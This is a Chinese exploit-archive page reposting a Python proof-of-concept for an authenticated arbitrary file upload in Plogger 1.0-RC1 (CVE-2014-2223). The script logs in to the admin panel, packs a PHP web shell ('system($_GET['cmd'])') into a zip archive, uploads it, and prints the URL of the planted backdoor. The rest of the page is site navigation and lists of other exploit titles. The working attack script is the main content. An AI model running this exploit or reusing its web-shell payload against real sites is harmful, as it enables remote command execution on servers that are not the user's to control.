首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Plogger 1.0-RC1 - Authenticated Arbitrary File Upload 来源：vfocus.net 作者：b0z 发布时间：2014-08-29   #!/usr/bin/env python # Exploit Title: Plogger Authenticated Arbitrary File Upload # Date: Feb 2014 # Exploit Author: b0z # Vendor Homepage: www.plogger.org # Software Link: www.plogger.org/download # Version: Plogger prior to 1.0-RC1 # CVE : 2014-2223 import hashlib import os import zipfile import requests import time import argparse def login(session,host,username,password):     print "[+] Log in"     session.post('http://%s/plog-admin/plog-upload.php' % host, data={         "plog_username": username,         "plog_password": password,         "action": "log_in"     }) def upload(session):     print "[+] Creating poisoned gift"     ## Write the backdoor     backdoor = open(magic + '.php', 'w+', buffering = 0)     backdoor.write("<?php system($_GET['cmd']) ?>")     backdoor.close     # Add true image file to block the race condition (mandatory not null)     image = open(magic + '.png', 'w+', buffering = 0)     image.write('A')     image.close     gift = zipfile.ZipFile(magic + '.zip', mode = 'w')     gift.write(magic + '.php')     gift.write(magic + '.png')     gift.close     os.remove(magic + '.php')     os.remove(magic + '.png')     gift = open(magic + '.zip', 'rb')     files= { "userfile": ("archive.zip", gift)}     session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,         data = {             "destination_radio":"existing",             "albums_menu" : "1",             "new_album_name":"",             "collections_menu":"1",             "upload":"Upload"     })     os.remove(magic + '.zip')     print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic) if __name__== "__main__":     parser = argparse.ArgumentParser()     parser.add_argument("--host"        , help="Remote host",required=True)     parser.add_argument("--user"        , help="Username",required=True)     parser.add_argument("--password"    , help="Password",required=True)     args = parser.parse_args()     host     = args.host     username = args.user     password = args.user     magic = hashlib.sha1(time.asctime()).hexdigest()     session = requests.session()     login(session,host,username,password)     upload(session)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Internet Explorer MS14-029 Mem ·ActualAnalyzer Lite 2.81 - Una ·Firefox WebIDL Privileged Java ·PhpWiki - Remote Command Execu ·glibc Off-by-One NUL Byte gcon ·XRMS - Blind SQL Injection and ·Grand MA 300 Fingerprint Reade ·NRPE 2.15 Remote Command Execu ·SMF Flood Filter Issue ·HTML Help Workshop 1.4 - (SEH) ·ManageEngine Password Manager ·IBM 1754 GCM KVM Multiple Vuln   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved